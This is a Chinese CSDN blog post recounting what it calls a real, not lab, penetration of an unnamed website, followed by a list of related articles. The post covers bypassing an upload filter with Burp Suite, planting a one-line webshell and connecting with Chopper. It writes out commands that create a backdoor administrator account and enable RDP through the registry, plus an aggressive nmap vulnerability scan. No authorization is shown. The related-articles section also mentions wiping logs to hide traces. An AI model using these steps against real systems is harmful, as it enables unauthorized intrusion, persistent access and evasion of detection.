记一次真实渗透经历

最新推荐文章于 2023-08-10 10:15:00 发布
最新推荐文章于 2023-08-10 10:15:00 发布
阅读量3.7k 收藏 19
点赞数 7
分类专栏: 杂记 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39682037/article/details/106291565
版权

本文纯属分享一种实战思维,如有损害利益,请联系小编

背景小编就不多解释了,网络上很多都是关于靶机教程,小编在这里给大家带来一次实战的效果

小编在某站点扫描时,发现其可能存在上传漏洞
在这里插入图片描述
小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传
在这里插入图片描述
成功上传之后,利用一句话木马进行连接
在这里插入图片描述
利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。
在这里插入图片描述
例:

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

用nmap扫描查看是否成功开启3389

nmap -T4 -A -sV -Pn -f --min-hostgroup 1024 --min-parallelism 1024 --script=smb-vuln-*.nse IP -p 1-65535

在这里插入图片描述

利用windows自带的远程工具连接,之后…睡觉吧
在这里插入图片描述

qq_39682037
关注
  • 7
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
谈一谈渗透测试流程
02-24
渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。本文根据作者的渗透测试经验,讲讲基本的渗透测试流程,分享给大家。当拿到一个合法的渗透测试项目时,我们首先应该明确客户要求我们进行渗透测试的范围以及整体项目的时间。比如,给我们的域名有哪些,ip段有哪些,哪些社工手段我们不能使用等等真实ip查询当然,如果连真实ip都没有找到的话。相当于连门都没有找到,这里最头疼的就是企业常常为了增强网页访问速度为
一次完整的安全渗透测试
12-28
一次完整的安全渗透测试
Web渗透-一次艰难获取后台经历-metinfo5.3.18密码重置漏洞复现
qq_45066095的博客
08-26 1041
前期准备 内部搭建环境进行了一次为期两天的演练,通过给的测试地址发现这是一个静态网页,发现URL中有参数id=某某数,心想着这就要被我挖掘出来了,我激动的手指颤抖着敲打键盘,尝试用sqlmap跑了下发现进行了拦截,最后手工尝试也没成功。然后又尝试看有没有跨站漏洞,发现对输入的数据进行了过滤。内心一下子就拔凉拔凉的,打算擦干眼泪接着整,不信挖掘不到漏洞,准备大干一场。开始扫描端口和目录,余光一扫看到吃饭点了,迅速关上电脑迈着欢快的步伐。。。。。。 挖掘漏洞 吃得饱饱的回来查看开放的端口 发现开放shh,进行
一次曲折的渗透测试经历
热门推荐
乐枕的家
04-21 1万+
昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.工具地址在:https://github.com/Xyntax/POC-T随意拿了一个看似大厂商的,作本次入侵测试发现传送门通过jexboss拿到shell,看到是centos的机器(IP已打码).看起来是root,确认一下.不稳定的传送门shell的问题接下来执行命令的时候,发现这个jexboss自带的
一次渗透测试艰难打点的过程
include_voidmain的博客
06-07 1454
一次渗透测试艰难打点的过程
一次渗透经历
wuliyouMaozhi的博客
08-31 468
每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。
一次难忘的渗透测试
合天网安学院
08-30 525
0*00前言前几天,我一个朋友叫我帮忙测试一下他们公司的网站,本来我是不愿意的,但是无奈被一顿火锅收买了。0*01信息收集环境是php+apache端口扫描御剑扫一波目录御剑,发现rob...
一次WEB服务器渗透测试笔
思索的蜗牛的专栏
06-24 3201
渗透测试是最能直接的反映系统的安全性的一种手段了。现整理了前段时间进行的一次渗透测试的笔,整个过程中所使用的工具和思路都比较简单,本文也正是为了您的系统不被这些“简单”的东西所击败而作。   此次渗透测试的已知条件只有一个:目标IP地址211.***.***.114。  首先当然是常规的扫描nmap -v -sS -O 211.***.***.114,得到的结果如下:  (The 1
渗透测试之渗透某培训平台经历
hackzkaq的博客
04-06 580
零基础学黑客,搜索公众号:白帽子左一 某天工作室小伙伴发了个某学校培训平台的URL给我有注入,于是我们俩就开始了愉快的渗(mo)透(yu)旅程 从注入摸到XXE 首先这个站有一个学生登录口和一个管理登录口: 自然是先用学生身份注册一个账号,进去之后到处摸,然后在课程支付的地方找到一个注入点 因为这个培训平台的所有课程都是付费的,所以首先需要支付才能进行学习。在点击支付后会生成一个支付录,然后跳转至另一个外部网站进行支付过程。然后就找到一个支付录查询的页面: 对应HTTP包抓一下,发现user_c
给第一次渗透项目的新手总结的一些感悟
hackzkaq的博客
06-07 1976
在前面首先很重要的是授权 ,之前也看过很多关于渗透测试的文章,但是因为一些现实因素等等问题,没(bu)有(gan)真正实操,最近由于一次偶然的机会,什么都不会的我接到了一个渗透测试项目然后就把最近学到的一些东西,和一些小感悟,小技巧录下来,由于一些特殊原因,本文中不涉及到渗透过程中的任何敏感信息首先跟我一样菜当然是装不出大神的,当然还是多学,多积累最重要,但是既然都开始了,就不能显得太划水,下面的操作不能让你成为大...
一次不完整的渗透1
08-08
一次不完整的渗透1
一次渗透实战.pdf
08-14
一次渗透实战教程,里面详细载了渗透实战过程,通过漏洞概述、漏洞明,是学员有清晰认识。
一次BIGIP Configuration Utility渗透.pdf
最新发布
04-22
一次BIGIP Configuration Utility渗透.pdf
一次完整的内网渗透经历
weixin_51725318的博客
08-10 90
一次完整的内网渗透经历
网络安全之一个渗透测试小案例
qq_44005305的博客
02-13 284
发现BucketName字段消失了,原来的NoSuchBucket也变成了NoSuchCustomDomain,明我们的修改对它造成了影响!无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不慌,问题不大,时间还长,接下来要做的,就是整理思路,重新来过。
渗透测试以及安全面试的经验之谈-技术篇
weixin_34100227的博客
06-18 9840
技术面试问题 CTF 一个印象深刻的CTF的题目 Padding Oracle->CBC->密码学(RSA/AES/DSA/SM) CRC32 反序列化漏洞 sql二次注入 第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是...
安全测试方法论
千寻的博客
10-02 1365
安全测试方法论 开放式Web 应用程序安全项目(Open Web Application Security Project,OWASP) 通用缺陷列表(Common Weakness Enumeration,CWE) 通用漏洞与披露(Common Vulnerabilities and Exposures,CVE) 其他方法论 OWAPS [网站](http://www.owasp.org.cn/...
渗透测试】浅一次挖洞经历
qq_48201589的博客
04-16 6328
一次比较愉快的挖洞历程 一开始拿到主站,翻了翻没啥可用的中间件漏洞版本信息。所以,还是那句老话:柿子还是要挑软的捏。光速去搜寻他的旁站(我用的是奇安信的Hunter)。 果不其然搜索到了他的后台登录系统。既然是登录,当然要用BP去爆破一下他的密码了。一般后台用户名要么是admin,要么是root。 很幸运,又让我成功的爆破了出来他的密码。弱口令+1。 进入后台,就要尝试有没有出现未授权访问了,没有的话也别灰心,继续去找它的功能点,比如他的搜索框。(很容易有SQL注入) 用BP抓..
一次完整的渗透测试流程
05-23
一次完整的渗透测试流程通常分为以下几个步骤: 1. 阶段一:信息收集 这个阶段是为了获取目标系统的信息,包括IP地址、域名、网络拓扑结构、操作系统、服务、应用程序等等。渗透测试人员可以使用各种工具和技术,如端口扫描、WHOIS查询、DNS枚举、搜索引擎、社交工程等。 2. 阶段二:漏洞扫描与分析 在这个阶段,渗透测试人员会使用各种漏洞扫描工具对目标系统进行扫描,以识别潜在的漏洞和弱点。渗透测试人员还会对扫描结果进行分析和验证,以确定漏洞的可利用性和危害性。 3. 阶段三:攻击与渗透 在这个阶段,渗透测试人员会尝试利用已发现的漏洞和弱点,对目标系统进行攻击和渗透。这可能包括使用已知的攻击工具或编写自定义的攻击代码,以实现目标。 4. 阶段四:提权与维持访问 一旦成功渗透到目标系统,渗透测试人员会尝试提升其权限,以获取更高的访问级别和更敏感的信息。然后,他们会尝试维持对目标系统的访问,以便长期地进行监视和数据收集。 5. 阶段五:清理 在完成渗透测试之后,渗透测试人员会清理所有的痕迹和证据,以避免留下攻击痕迹和可能被发现的证据。这包括删除系统日志、恢复文件时间戳等。 6. 阶段六:报告 在完成渗透测试之后,渗透测试人员会生成一份详细的报告,列出所有发现的漏洞和弱点,以及建议的修补措施。此报告将提供给客户,以便他们能够采取必要的措施来保护其系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值